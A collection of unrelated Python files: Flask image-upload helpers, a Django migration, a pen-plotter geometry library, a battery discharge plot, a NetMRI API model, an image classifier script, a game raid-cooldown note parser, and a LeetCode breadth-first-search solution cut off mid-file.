dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), foldPath)
if not os.path.exists(dir):
os.makedirs(dir)
try:
#save profile image
file.save(os.path.join(dir, fileName))
except Exception as err:
print('Something went wrong: {}'.format(err))
return '0'
return '1'
else:
return '2'
#Allow png for pet profile update
ALLOWED_PET = set(['png'])
def allowedPet(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_PET
#upload pet profile in edit panel
#return 0 for error
#return 1 for success
#return 2 for file error
def petAvatar(file, petId):
#only the preset profile image name '0.png' is accepted
if file.filename != '0.png':
return '2'
#check file format
if file and allowedPet(file.filename):
fileName = secure_filename(file.filename)
foldPath = '../static/img/pet/' + str(petId) + '/cover/'
#create folder path if not exist
dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), foldPath)
if not os.path.exists(dir):
os.makedirs(dir)
try:
#save profile image
file.save(os.path.join(dir, fileName))
return '1'
except Exception as err:
print('Something went wrong: {}'.format(err))
return '0'
else:
return '2'
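# Illustrative sketch (hypothetical Flask route; the blueprint, URL and form field
# names below are assumptions, not defined in this module):
#
#   from flask import Blueprint, request
#   uploads = Blueprint('uploads', __name__)
#
#   @uploads.route('/pet/<int:pet_id>/moment', methods=['POST'])
#   def upload_moment(pet_id):
#       result = momentImage(request.files['moment'], pet_id)
#       # '2' -> rejected file, '1' -> save error, anything else -> stored file name
#       return {'result': result}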
|
# Generated by Django 2.2.7 on 2019-11-17 17:40
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0005_post_edit_date'),
]
operations = [
migrations.CreateModel(
name='SiteUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=20, unique=True)),
('first_name', models.CharField(max_length=20)),
('second_name', models.CharField(max_length=30)),
('registration_date', models.DateTimeField(blank=True, null=True)),
('picture', models.ImageField(blank=True, max_length=255, null=True, upload_to='UserPhotos/%username/')),
('password', models.CharField(max_length=30)),
],
),
]
|
# AUTOGENERATED! DO NOT EDIT! File to edit: 00_gram.ipynb (unless otherwise specified).
__all__ = ['linebreak', 'dist_from_point', 'lines_to_layer', 'layer_to_lines', 'get_point_on_line', 'radial_to_xy',
'gaussian_random_walk', 'LineFactory', 'ChordFactory', 'RandomChordFactory', 'RadiusModChordFactory',
'RadiusModBezierChordFactory', 'Turtle']
# Cell
import bezier
from matplotlib.collections import LineCollection
from matplotlib import pyplot as plt
import numpy as np
from penkit import write, preview
from pathlib import Path
import seaborn as sns
from tqdm import tqdm
linebreak = np.array([[np.nan],[np.nan]])
# Cell
def dist_from_point(line, point):
'''calculate euclidean distance of a set of points from a reference point'''
return ((line - point) ** 2).sum(axis=1) ** 0.5
# Cell
def lines_to_layer(lines):
nanlines = []
for line in lines:
_line = np.concatenate([line,np.array([[np.nan, np.nan]])])
nanlines.append(_line)
nanlines = np.concatenate(nanlines)
x = nanlines[:,0]
y = nanlines[:,1]
return (x,y)
# Cell
def layer_to_lines(layer):
_layer = layer[:, 1:] # drop first column containing placeholder nan
_layer = np.append(_layer, linebreak, axis=1) # add linebreak to end
isnan = np.isnan(_layer[0, :]).nonzero()[0]
lines = []
start_ind = 0
for nan_ind in isnan:
line = _layer[:, start_ind:nan_ind].T
lines.append(line)
start_ind = nan_ind + 1
return lines
# Cell
def get_point_on_line(pointA, pointB, distance):
AB = pointB - pointA
pointC = pointA + (AB * distance)
return pointC
# Cell
def radial_to_xy(r, theta):
x = np.cos(theta) * r
y = np.sin(theta) * r
return (x, y)
# Cell
def gaussian_random_walk(n, step_init=1, step_mu=0., step_std=1, scale=True):
ys = []
y = step_init
if scale:
step_mu /= n
step_std /= n
for i in range(n):
ys.append(y)
y += np.random.randn() * step_std + step_mu
return np.array(ys)
# Cell
class LineFactory(object):
def __init__(self):
self.lines = np.array([[np.nan],
[np.nan]])
def gen_line(self, pointA, pointB, ):
line = np.array([[pointA[0], pointB[0]],
[pointA[1], pointB[1]],
])
return line
def add_line(self, line, terminate=True):
if terminate:
line = np.append(line, linebreak.copy(), axis=1)
self.lines = np.append(self.lines, line, axis=1)
def gen_bezier(self, nodes, bez_eval_start=0, bez_eval_end=1, n_eval_points=1000):
nodes = np.asfortranarray(nodes)
curve = bezier.Curve(nodes, degree=(nodes.shape[1]-1))
eval_points = np.linspace(bez_eval_start, bez_eval_end, n_eval_points)
x, y = curve.evaluate_multi(eval_points)
return np.stack([x, y])
def add_bezier(self, nodes, bez_eval_start=0, bez_eval_end=1, n_eval_points=1000, terminate=True):
line = self.gen_bezier(nodes, bez_eval_start, bez_eval_end, n_eval_points)
self.add_line(line, terminate=terminate)
def flip_alternating_lines(self):
lines = layer_to_lines(self.lines)
new_lines = []
for i, line in enumerate(lines):
if i % 2:
new_lines.append(np.flipud(line))
else:
new_lines.append(line)
self.lines = np.append(linebreak, lines_to_layer(new_lines), axis=1)
def plot_lines(self, ax, lc_kwargs={}):
lc = LineCollection(layer_to_lines(self.lines), **lc_kwargs)
ax.add_collection(lc)
ax.axis('tight')
ax.axis('square')
# Cell
class ChordFactory(LineFactory):
def __init__(self,
center=np.array([0.,0.]),
radius=1,
):
self.center = center.reshape(2,1)
self.radius = radius
self.lines = np.array([[np.nan], [np.nan]])
@property
def center_x(self):
return self.center[0]
@property
def center_y(self):
return self.center[1]
def gen_chord(self, theta0, theta1, radius0=None, radius1=None):
if not radius0:
radius0 = self.radius
if not radius1:
radius1 = self.radius
x0, y0 = radial_to_xy(radius0, theta0)
x1, y1 = radial_to_xy(radius1, theta1)
chord = np.array([[x0, x1, np.nan],
[y0, y1, np.nan],
])
chord += self.center
return chord
def add_chord(self, theta0, theta1, radius0=None, radius1=None):
chord = self.gen_chord(theta0, theta1, radius0, radius1)
self.lines = np.append(self.lines, chord, axis=1)
def gen_diameter(self, theta0, radius=None):
if not radius:
radius = self.radius
theta1 = theta0 + np.pi
return self.gen_chord(theta0=theta0,
theta1=theta1,
radius0=radius,
radius1=radius
)
def add_diameter(self, theta0, radius=None):
diameter = self.gen_diameter(theta0, radius)
self.lines = np.append(self.lines, diameter, axis=1)
def gen_bezier_chord(self,
thetas,
radii,
bez_eval_start=0,
bez_eval_end=1,
n_eval_points=1000
):
n = len(thetas)
xs = np.zeros(n)
ys = np.zeros(n)
for i in range(n):
theta = thetas[i]
radius = radii[i]
x, y = radial_to_xy(radius, theta)
xs[i] = x
ys[i] = y
nodes = np.stack([xs,ys])
line = self.gen_bezier(
nodes,
bez_eval_start=bez_eval_start,
bez_eval_end=bez_eval_end,
n_eval_points=n_eval_points)
line = line + self.center
return line
# Cell
class RandomChordFactory(ChordFactory):
def add_random_diameters(self, n_diameters=10):
for theta in np.random.rand(n_diameters) * np.pi * 2:
self.add_diameter(theta)
def add_random_chords_at_set_d_theta(self, n_chords, d_theta):
for theta0 in np.random.rand(n_chords) * np.pi * 2:
theta1 = theta0 + d_theta
self.add_chord(theta0=theta0, theta1=theta1)
def add_connected_chords_at_set_d_theta(self, n_chords, d_theta):
theta0 = np.random.rand() * np.pi * 2
for i in range(n_chords):
theta1 = theta0 + d_theta
self.add_chord(theta0=theta0, theta1=theta1)
theta0 = theta1
def add_connected_chords_stochastic_d_theta(self,
n_chords,
d_theta_mu=0,
d_theta_std=1,
):
theta0 = np.random.rand() * np.pi * 2
for i in range(n_chords):
theta1 = theta0 + np.random.randn() * d_theta_std + d_theta_mu
self.add_chord(theta0=theta0, theta1=theta1)
theta0 = theta1
def add_nearby_chords_stochastic(self,
n_chords,
theta_mu=0,
theta_std=0,
d_theta_mu=0,
d_theta_std=0,
radius_mu=0,
radius_std=0,
):
theta0 = np.random.rand() * np.pi * 2
radius = self.radius
for i in range(n_chords):
theta1 = theta0 + np.random.randn() * d_theta_std + d_theta_mu
self.add_chord(theta0=theta0, theta1=theta1, radius0=radius, radius1=radius)
radius = radius + np.random.randn() * radius_std + radius_mu
theta0 = theta1 + np.random.randn() * theta_std + theta_mu
# Cell
class RadiusModChordFactory(ChordFactory):
def __init__(self,center=np.array([0.,0.])):
self.center = center.reshape(2,1)
self.lines = np.array([[np.nan], [np.nan]])
self.initialize_params()
def initialize_params(self,
n_chords=500,
d_theta=np.pi*0.6,
start_theta=0,
end_theta=np.pi*2,
overshoot_init=1,
overshoot_step_mu=0.,
overshoot_step_std = 20,
):
self.n_chords = n_chords
self.theta0s = np.linspace(start_theta, end_theta, n_chords)
self.theta1s = self.theta0s + d_theta
self.radius0s = np.ones(n_chords)
self.radius1s = np.ones(n_chords)
self.overshoots = gaussian_random_walk(n_chords,
step_init=overshoot_init,
step_mu=overshoot_step_mu,
step_std=overshoot_step_std,
scale=True)
def plot_params(self):
f,axs = plt.subplots(5, 1, sharex=True, figsize=(12,8))
axs[0].plot(self.theta0s, label='theta0s')
axs[1].plot(self.theta1s, label='theta1s')
axs[2].plot(self.radius0s, label='radius0s')
axs[3].plot(self.radius1s, label='radius1s')
axs[4].plot(self.overshoots, label='overshoots')
for ax in axs:
ax.legend()
def add_single_overshoot_chords(self):
for i in range(self.n_chords):
line = self.gen_chord(theta0=self.theta0s[i],
theta1=self.theta1s[i],
radius0=self.radius0s[i],
radius1=self.radius1s[i])
pointA = line[:,0]
pointB = line[:,1]
new_pointB = get_point_on_line(pointA, pointB, self.overshoots[i])
new_line = self.gen_line(pointA, new_pointB)
self.add_line(new_line)
def add_double_overshoot_chords(self):
for i in range(self.n_chords):
line = self.gen_chord(theta0=self.theta0s[i],
theta1=self.theta1s[i],
radius0=self.radius0s[i],
radius1=self.radius1s[i])
pointA = line[:,0]
pointB = line[:,1]
new_pointB = get_point_on_line(pointA, pointB, self.overshoots[i])
new_pointA = get_point_on_line(pointB, pointA, self.overshoots[i])
new_line = self.gen_line(new_pointA, new_pointB)
self.add_line(new_line)
# Cell
class RadiusModBezierChordFactory(ChordFactory):
def __init__(self,center=np.array([0.,0.])):
self.center = center.reshape(2,1)
self.lines = np.array([[np.nan], [np.nan]])
self.initialize_params()
def initialize_params(self,
n_chords=500,
d_theta=np.pi*0.6,
start_theta=0,
end_theta=np.pi*2,
middle_node_rel_thetas=[0.5,],
overshoot_init=1,
overshoot_step_mu=0.,
overshoot_step_std = 20,
):
self.n_chords = n_chords
chord_start_thetas = np.linspace(start_theta, end_theta, n_chords)
chord_end_thetas = chord_start_thetas + d_theta
middle_nodes = []
for node_rel_theta in middle_node_rel_thetas:
middle_nodes.append(chord_start_thetas + d_theta * node_rel_theta)
self.thetas = np.stack([chord_start_thetas,] + middle_nodes + [chord_end_thetas,]).T
self.radii = np.ones(self.thetas.shape)
self.overshoots = gaussian_random_walk(n_chords,
step_init=overshoot_init,
step_mu=overshoot_step_mu,
step_std=overshoot_step_std,
scale=True)
def add_single_overshoot_bezier_chords(self):
for i in range(self.n_chords):
_thetas = self.thetas[i, :]
_radii = self.radii[i, :]
overshoot = self.overshoots[i]
line = self.gen_bezier_chord(
_thetas,
_radii,
bez_eval_start=0,
bez_eval_end=overshoot,
n_eval_points=1000
)
self.add_line(line)
def globe_params(self,
n_chords=500,
start_theta=0.,
end_theta=np.pi*2,
middle_node_rel_thetas=[0.5,],
overshoot_init=1,
overshoot_step_mu=0.,
overshoot_step_std = 0,
):
self.n_chords = n_chords
chord_start_thetas = np.linspace(start_theta, end_theta, n_chords)
chord_end_thetas = - chord_start_thetas
middle_nodes = np.stack([chord_start_thetas,chord_end_thetas]).mean(axis=0)
self.thetas = np.stack([chord_start_thetas, middle_nodes, chord_end_thetas,]).T
self.radii = np.ones(self.thetas.shape)
# self.radii[:,1] = np.linspace(1,-1,n_chords)
self.radii[:,1] = -1
self.overshoots = gaussian_random_walk(n_chords,
step_init=overshoot_init,
step_mu=overshoot_step_mu,
step_std=overshoot_step_std,
scale=True)
# Cell
class Turtle(LineFactory):
def __init__(self, x=0, y=0, rad=0, pen='up'):
self.x = x
self.y = y
self.rad = rad
self.pen = pen
super().__init__()
@property
def coord(self):
return np.array([[self.x], [self.y]])
@coord.setter
def coord(self, new_coord):
self.x = new_coord[0]
self.y = new_coord[1]
@property
def degrees(self):
return self.rad / (np.pi * 2) * 360
@degrees.setter
def degrees(self, degrees):
self.rad = degrees / 360 * np.pi * 2
def add_point(self):
self.lines = np.append(self.lines, self.coord, axis=1)
def pen_down(self):
self.pen = 'down'
self.add_point()
def pen_up(self):
self.pen = 'up'
self.lines = np.append(self.lines, linebreak.copy(), axis=1)
def forward(self, d):
self.x += np.cos(self.rad) * d
self.y += np.sin(self.rad) * d
if self.pen == 'down':
self.add_point()
def turn(self, d_angle, use_degrees=False):
if use_degrees:
new_degrees = self.degrees + d_angle
self.degrees = new_degrees % 360
else:
new_rad = self.rad + d_angle
self.rad = new_rad % (np.pi * 2)
def circle(self, radius, extent=(np.pi*2), n_eval_points=1000, use_degrees=False):
d_angle = extent / n_eval_points
forward_d = 2 * radius / n_eval_points
for n in range(n_eval_points):
self.forward(forward_d)
self.turn(d_angle, use_degrees=use_degrees)
def split(self):
return self.__class__(x=self.x, y=self.y, rad=self.rad, pen=self.pen)
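# Illustrative sketch (not exported from the notebook): draw a unit square with the
# Turtle defined above and render it with matplotlib.
if __name__ == '__main__':
    t = Turtle()
    t.pen_down()
    for _ in range(4):
        t.forward(1)
        t.turn(np.pi / 2)
    t.pen_up()
    fig, ax = plt.subplots()
    t.plot_lines(ax)
    plt.show()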
|
import pandas as pd
import matplotlib.pyplot as plt
oneC = pd.read_csv('discharge_pulse_1.0C.csv')
oneC.columns = ['timestamp', 'time', 'tag', 'voltage', 'current', 'capacity', 'temperature']
oneC = oneC.drop('timestamp', axis=1)
oneCsoc = 1 - oneC.capacity/oneC.capacity.max() # this needs to be corrected: the maximum capacity here is not the usable capacity, it should be taken from the C/35 tests
oneC = oneC.assign(soc=oneCsoc.values)
oneCreltime = oneC.time/oneC.time.max()
oneC = oneC.assign(reltime=oneCreltime.values)
print(oneC.head())
halfC = pd.read_csv('discharge_pulse_0.5C.csv')
halfC.columns = ['timestamp', 'time', 'tag', 'voltage', 'current', 'capacity', 'temperature']
halfC = halfC.drop('timestamp', axis=1)
halfCsoc = 1 - halfC.capacity/oneC.capacity.max()
halfC = halfC.assign(soc=halfCsoc.values)
halfCreltime = halfC.time/halfC.time.max()
halfC = halfC.assign(reltime=halfCreltime.values)
print(halfC.head())
quarterC = pd.read_csv('discharge_pulse_0.25C.csv')
quarterC.columns = ['timestamp', 'time', 'tag', 'voltage', 'current', 'capacity', 'temperature']
quarterC = quarterC.drop('timestamp', axis=1)
quarterCsoc = 1 - quarterC.capacity/oneC.capacity.max()
quarterC = quarterC.assign(soc=quarterCsoc.values)
quarterCreltime = quarterC.time/quarterC.time.max()
quarterC = quarterC.assign(reltime=quarterCreltime.values)
print(quarterC.head())
plt.figure(figsize=[15,5])
plt.plot(oneC.reltime, oneC.voltage, label='1.0C')
#plt.plot(oneC.time, oneC.soc, label='1.0C')
# plt.plot(halfC.reltime, halfC.voltage, label='0.5C')
# plt.plot(quarterC.reltime, quarterC.voltage, label='0.25C')
plt.xlabel('relative time', fontsize=15)
plt.ylabel('voltage(V)', fontsize=15)
plt.legend()
plt.show()
|
from ..remote import RemoteModel
from infoblox_netmri.utils.utils import check_api_availability
class UploadedCertificateGridRemote(RemoteModel):
"""
| ``id:`` none
| ``attribute type:`` string
| ``certificate_id:`` none
| ``attribute type:`` string
| ``name:`` none
| ``attribute type:`` string
| ``issuer:`` none
| ``attribute type:`` string
| ``validFrom:`` none
| ``attribute type:`` string
| ``validUntil:`` none
| ``attribute type:`` string
| ``subject:`` none
| ``attribute type:`` string
"""
properties = ("id",
"certificate_id",
"name",
"issuer",
"validFrom",
"validUntil",
"subject",
)
|
"""
compute the score and categories
"""
import os
import sys
import torch
import torch.nn.functional as F
from PIL import Image
from torchvision.transforms import transforms
sys.path.append('../')
from contrast.models import vgg19
from networks.resnet import resnet18
from utils.util import add_prefix, remove_prefix, write
def load_pretrained_model(pretrained_path, model_type):
checkpoint = torch.load(add_prefix(pretrained_path, 'model_best.pth.tar'))
if model_type == 'vgg':
model = vgg19(pretrained=False, num_classes=2)
print('load vgg successfully.')
elif model_type == 'resnet':
model = resnet18(is_ptrtrained=False)
print('load resnet18 successfully.')
else:
raise ValueError('unsupported model_type: %s' % model_type)
model.load_state_dict(remove_prefix(checkpoint['state_dict']))
return model
def preprocess(path):
"""
Images in the custom-defined skin dataset end with the suffix .jpg, while images in the DR dataset end with the suffix .jpeg.
:param path:
:return:
"""
if '.jpeg' in path:
mean = [0.651, 0.4391, 0.2991]
std = [0.1046, 0.0846, 0.0611]
elif '.jpg' in path:
mean = [0.7432, 0.661, 0.6283]
std = [0.0344, 0.0364, 0.0413]
else:
raise ValueError('unsupported image suffix in path: %s' % path)
normalize = transforms.Normalize(mean, std)
transform = transforms.Compose([
transforms.ToTensor(),
normalize,
])
img_pil = Image.open(path)
return transform(img_pil).unsqueeze(0)
def main(data_dir, pretrained_path, model_type, saved_path, suffix):
model = load_pretrained_model(pretrained_path, model_type)
model.eval()
results = classify(data_dir, model, suffix)
print(str(results))
save_results(results, os.path.join(saved_path, suffix))
def save_results(results, saved_path):
if not os.path.exists(saved_path):
os.makedirs(saved_path)
write(results, '%s/results.txt' % (saved_path))
def classify(data_dir, model, suffix):
results = dict()
for phase in ['lesion', 'normal']:
path = '%s/%s_data_%s' % (data_dir, phase, suffix)
total_nums = len(os.listdir(path))
for image_idx, name in enumerate(os.listdir(path), 1):
abs_path = os.path.join(path, name)
img_tensor = preprocess(abs_path)
classes = {'lesion': 0,
'normal': 1}
logit = model(img_tensor)
h_x = F.softmax(logit, dim=1).data.squeeze()
probs, idx = h_x.sort(0, True)
label = 0 if 'lesion' in name else 1
results[name] = dict(label=label, pred=idx[0].item(), prob=probs[0].item())
if image_idx % 50 == 0:
print('%s:[%d/%d]' % (phase, image_idx, total_nums))
return results
if __name__ == '__main__':
# classify dataset
main(data_dir='../gan174/all_results_499/', pretrained_path='../classifier06',
saved_path='../gan174/all_results_499/after_training',
model_type='resnet', suffix='single')
# note: the suffix parameter should be one of ['original', 'single']
main(data_dir='../gan174/all_results_499/', pretrained_path='../classifier06',
saved_path='../gan174/all_results_499/after_training',
model_type='resnet', suffix='original')
|
from enum import Enum
from typing import Match, List, TextIO, Final
from pathlib import Path
import logging
import os
import re
import sys
HEALER_ROSTER = ["Hôsteric", "Delvur", "Yashar", "Pv", "Runnz",
"Lífeforce", "Seiton"]
RAID_LEAD = "Slickduck"
class RaidLeadVisibility(Enum):
ALL = 1
HEALER_CDS = 2
NON_HEALER_CDS = 3
PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)))
SOURCE = os.path.join(PATH, 'soulrender-cds.txt')
NON_HEALER_DEST = os.path.join(PATH, 'non-healer-cds.txt')
ENCAPSULATED_CD_DEST = os.path.join(PATH, 'encapsulated-cds.txt')
HEADER_REGEX: Final = re.compile(r".*-.*?-\s")
NAME_GROUP_REGEX: Final = r"([\s\w]*)"
SPELL_GROUP_REGEX: Final = r"(\s*{spell:[0-9]*}\s\s)"
RAID_CD_REGEX: Final = re.compile(
rf"\|c[0-9abcdefABCDEF]{{6,8}}{NAME_GROUP_REGEX}\|r{SPELL_GROUP_REGEX}")
def handle_data_format_bug_1(event_list) -> List[str]:
"""Fix for a known formatting bug.
Spreadsheet can sometimes export cds where there is no space between
name and spell id. This function adds that space.
https://discord.com/channels/756215582021517473/804095740207956009/873297331175432212
Args:
event_list(List[str]): source list of events to be fixed.
Returns:
List of correctly formatted cds.
"""
fixed_event_list = []
for event in event_list:
event = re.sub('[|]r{', '|r {', event)
fixed_event_list.append(event)
return fixed_event_list
def append_event_to_file(event, dest_file):
"""Copies an event to a specified file.
Args:
event(str): The entire event to be copied to the specified file.
An event consists of an event header and list of healer cooldowns.
dest_file(TextIO): The file that will be written to.
"""
dest_file.write(event + '\n')
def clear_file(file_name):
"""Clear the contents of file at the specified path
Args:
file_name(str): The path of the file to clear.
"""
if os.path.isfile(file_name):
file = open(file_name, 'w')
file.close()
def find_header(event) -> str:
"""Returns the header portion of an event.
A header is everything up to and including the second '-' and the space that follows it.
Usually one of the following formats:
Dynamic Timers: {time:00:00} |c00000000Name|r - 00:00 -
Static Timers: |c00000000Name|r - 00:00 -
Args:
event(str): The full event string.
"""
match = HEADER_REGEX.match(event)
if match is None:
logging.error("Error parsing header for event event=" + event)
return " "
return match.group()
def find_cds_for_healer(event, healer) -> List[Match]:
"""Returns a list of match objects for a given healer
A cd consists of a name and a spell, in the following format:
color name spell-icon
|cfff38bb9Runnz|r {spell:31821}
Given an event, we use a regex search to find all of the cds the
given healer has for this event, and package them into a list of Match
objects.
Match Object:
Group 1) Name
Group 2) Spell
Args:
event(str): The full event string.
healer(str): The healer whose cds we're looking for.
"""
healer_matches = []
matches = RAID_CD_REGEX.finditer(event)
for match in matches:
if match.groups()[0] == healer:
healer_matches.append(match)
return healer_matches
def get_healer_cd_text_from_matches(healer_cd_matches) -> str:
"""Returns a concatenated string of all cds give the list of matches
Args:
healer_cd_matches(List[Match]): The list of match objects we can use
to get the cd string from.
"""
cd_text = ""
for match in healer_cd_matches:
cd_text += match[0]
return cd_text
def do_split_healer_events(event_list, dest_file, healer):
"""Splits healer cds into files according to healer
Args:
event_list(List[str]): The full list of damage events.
dest_file(TextIO): The file we'll be copying events to.
healer: The current healer that we're copying cds for.
"""
event_list = handle_data_format_bug_1(event_list)
for event in event_list:
# This is the list of cds the current healer has on this boss ability
healer_cd_matches = find_cds_for_healer(event, healer)
# This is the concatenated string of cds for this event and healer.
healer_cd_text = get_healer_cd_text_from_matches(healer_cd_matches)
if healer_cd_text:
# This is the boss ability name and timestamp.
header = find_header(event)
event_text = header + healer_cd_text
append_event_to_file(event_text, dest_file)
def split_healer_events(cd_source):
"""Splits healer events into their respective files. """
for healer in HEALER_ROSTER:
with open(os.path.join(PATH, healer + '-cds.txt'),
'a+', encoding='utf-8') as cd_dest:
do_split_healer_events(cd_source, cd_dest, healer)
def remove_cds_from_event(event, healer) -> str:
"""Returns an event line that has been stripped of healer cds
Args:
event(str): The event we're processing
healer(str): The healer whose cds are being stripped from the event.
"""
matches = find_cds_for_healer(event, healer)
processed_event = event
for match in matches:
groups = match.groups()
if groups[0] == healer:
processed_event = processed_event.replace(match[0], "")
return processed_event
def do_strip_healer_cds(event_list, dest_file):
"""Strips healer cds from every event
Non-healer cds all go in the same file. This function will take
every event and remove all of the healer cds such that all that remains
is the non-healer cds.
Args:
event_list(List[str]): The list of events to process
dest_file(TextIO): The destination file to copy non-healer cds.
"""
event_list = handle_data_format_bug_1(event_list)
for event in event_list:
header = find_header(event)
processed_event = event
processed_event = processed_event.replace(header, "")
processed_event = processed_event.replace("\n", "")
for current_healer in HEALER_ROSTER:
processed_event = remove_cds_from_event(processed_event,
current_healer)
if processed_event:
processed_event = header + processed_event
append_event_to_file(processed_event, dest_file)
def strip_healer_cds(event_list):
"""Strips healer cds from the event list"""
with open(NON_HEALER_DEST, 'a+', encoding='utf-8') as dest_file:
do_strip_healer_cds(event_list, dest_file)
def should_be_visible_to_raid_leader(raider, raid_lead_visibility) -> bool:
"""Returns whether the raid leader should included in visibility
i.e, your raid leader may still want to call for non-healer cds or even
healer cds. This function returns true if the raider's status matches
the value of raid_lead_visibility.
Args:
raider: The name of the current raider. Used to look up whether healer
or not.
raid_lead_visibility(RaidLeadVisibility): flag that determines
whether the raid leader should be concerned about the raider's cds.
ALL - your raid leader will be able to see all raid cds
HEALER_CDS - your raid leader will be able to see all healer cds
NON_HEALER_CDS - your raid leader will be able to see cds only from
non healers like DH, DK, Warrior, etc.
"""
return (raid_lead_visibility == RaidLeadVisibility.ALL
or (raid_lead_visibility == RaidLeadVisibility.HEALER_CDS and
raider in HEALER_ROSTER)
or (raid_lead_visibility == RaidLeadVisibility.NON_HEALER_CDS and
raider not in HEALER_ROSTER))
def get_encapsulated_cd_from_match(cd_match, raid_lead_visibility) -> str:
"""Returns the healing cd wrapped in ERT visibility tags
Positive visibility tags have the following syntax:
opening tag text closing tag
{p: List[names]} ....... {/p}}
Any text between the opening and closing tag will only be visible
to raiders whose names are in the list of names.
Args:
cd_match(Match Object): The entire match object for a healing cd.
raid_lead_visibility(RaidLeadVisibility): flag that determines whether the
raid leader should also be able to see this cd.
"""
visibility_list = []
groups = cd_match.groups()
raider_name = groups[0]
if should_be_visible_to_raid_leader(raider_name, raid_lead_visibility):
visibility_list.append(RAID_LEAD)
visibility_list.append(raider_name)
visibility_str = ','.join(visibility_list)
cd = cd_match[0]
encapsulated_cd = f"{{p:{visibility_str}}}{cd}{{/p}}"
return encapsulated_cd
def encapsulate_cds(event_list, raid_lead_visibility):
"""Wraps cds in the event list with encapsulators that will cause
ERT to only render cds to their corresponding owners. The logic for
visibility is as follows:
If no one has cds for an event, the event is not added to the ERT note.
If a raider has a cd for an event, that event header and cd is visible
only to that raider
If the raid leader should also see the raider's cd according to the
raid_lead_visibility flag, then the event and specific raider cd
will also be visible to the raid lead.
ARGS:
event_list(List(str)): List of events containing raid cds.
raid_lead_visibility(RaidLeadVisibility): indicates whether the raid leader should
be included in the encapsulation.
"""
encapsulated_event_text = ""
for event in event_list:
header = find_header(event)
cds = ""
matches = RAID_CD_REGEX.finditer(event)
# If a healer has no cds for this event, they should also not see a
# header.
header_visibility_list = []
is_header_visible_to_rl = False
for match in matches:
groups = match.groups()
raider_name = groups[0]
# If we matched a healer for this event, the header should be
# visible to them.
header_visibility_list.append(raider_name)
is_raider_visible_to_rl = should_be_visible_to_raid_leader(
raider_name, raid_lead_visibility)
# If any raider cd in this event is visible to the raid leader,
# then the raidleader should also see the header.
is_header_visible_to_rl |= is_raider_visible_to_rl
cds += get_encapsulated_cd_from_match(match,
raid_lead_visibility)
if is_header_visible_to_rl:
header_visibility_list.append(RAID_LEAD)
# Only add unique values to the visibility list.
header_visibility_set = list(set(header_visibility_list))
visibility_str = ','.join(header_visibility_set)
# Don't add the event if no one has cds on it.
if cds:
# Don't show a header to people who don't have cds for this event.
encapsulated_header = f"{{p:{visibility_str}}}{header}{{/p}}"
encapsulated_event_text += f"{encapsulated_header}{cds}\n"
with open(ENCAPSULATED_CD_DEST, 'a+', encoding='utf8') as dest_file:
append_event_to_file(encapsulated_event_text, dest_file)
def main():
for healer in HEALER_ROSTER:
file_name = healer + '-cds.txt'
clear_file(file_name)
clear_file(NON_HEALER_DEST)
with open(SOURCE, 'r', encoding='utf-8') as test_file:
event_list = test_file.readlines()
split_healer_events(event_list)
strip_healer_cds(event_list)
raid_lead_visibility = RaidLeadVisibility.NON_HEALER_CDS
clear_file(ENCAPSULATED_CD_DEST)
with open(SOURCE, 'r', encoding='utf-8') as source_file:
event_list = source_file.readlines()
encapsulate_cds(event_list, raid_lead_visibility)
if __name__ == "__main__":
main()
|
# @lc app=leetcode id=433 lang=python3
#
# [433] Minimum Genetic Mutation
#
# https://leetcode.com/problems/minimum-genetic-mutation/description/
#
# algorithms
# Medium (44.32%)
# Likes: 638
# Dislikes: 79
# Total Accepted: 42.8K
# Total Submissions: 96.4K
# Testcase Example: '"AACCGGTT"\n"AACCGGTA"\n["AACCGGTA"]'
#
# A gene string can be represented by an 8-character long string, with choices
# from 'A', 'C', 'G', and 'T'.
#
# Suppose we need to investigate a mutation from a gene string start to a gene
# string end where one mutation is defined as one single character changed in
# the gene string.
#
#
# For example, "AACCGGTT" --> "AACCGGTA" is one mutation.
#
#
# There is also a gene bank bank that records all the valid gene mutations. A
# gene must be in bank to make it a valid gene string.
#
# Given the two gene strings start and end and the gene bank bank, return the
# minimum number of mutations needed to mutate from start to end. If there is
# no such a mutation, return -1.
#
# Note that the starting point is assumed to be valid, so it might not be
# included in the bank.
#
#
# Example 1:
#
#
# Input: start = "AACCGGTT", end = "AACCGGTA", bank = ["AACCGGTA"]
# Output: 1
#
#
# Example 2:
#
#
# Input: start = "AACCGGTT", end = "AAACGGTA", bank =
# ["AACCGGTA","AACCGCTA","AAACGGTA"]
# Output: 2
#
#
# Example 3:
#
#
# Input: start = "AAAAACCC", end = "AACCCCCC", bank =
# ["AAAACCCC","AAACCCCC","AACCCCCC"]
# Output: 3
#
#
#
# Constraints:
#
#
# start.length == 8
# end.length == 8
# 0 <= bank.length <= 10
# bank[i].length == 8
# start, end, and bank[i] consist of only the characters ['A', 'C', 'G', 'T'].
#
#
#
# @lc tags=Unknown
# @lc imports=start
from imports import *
# @lc imports=end
# @lc idea=start
#
# Given a gene string and a bank of valid mutations, where each step changes exactly one character,
# find the minimum number of mutations from start to end.
# Model the bank as a graph and traverse it breadth-first.
#
# @lc idea=end
# @lc group=
# @lc rank=
# @lc code=start
class Solution:
def minMutation(self, start: str, end: str, bank: List[str]) -> int:
if start == end:
return 0
if end not in bank:
return -1
if start not in bank:
bank.append(start)
adj = defaultdict(list)
l = len(bank)
kr = range(8)
for i in range(l):
si = bank[i]
for j in range(i + 1, l):
sj = bank[j]
if [si[k] == sj[k] for k in kr].count(True) == 7:
adj[si].append(sj)
adj[sj].append(si)
adjs = [start]
n = 0
visited = set(adjs)
while adjs:
adjsn = []
n += 1
for ad in adjs:
for a in adj[ad]:
if a == end:
return n
if a not in visited:
visited.add(a)
adjsn.append(a)
adjs = adjsn
return -1
pass
# @lc code=end
# @lc main=start
if __name__ == '__main__':
print('Example 1:')
print('Input : ')
print('start = "AACCGGTT", end = "AACCGGTA", bank = ["AACCGGTA"]')
print('Expected :')
print('1')
print('Output :')
print(str(Solution().minMutation("AACCGGTT", "AACCGGTA", ["AACCGGTA"])))
print()
print('Example 2:')
print('Input : ')
print(
'start = "AACCGGTT", end = "AAACGGTA", bank =["AACCGGTA","AACCGCTA","AAACGGTA"]'
)
print('Expected :')
print('2')
print('Output :')
print(
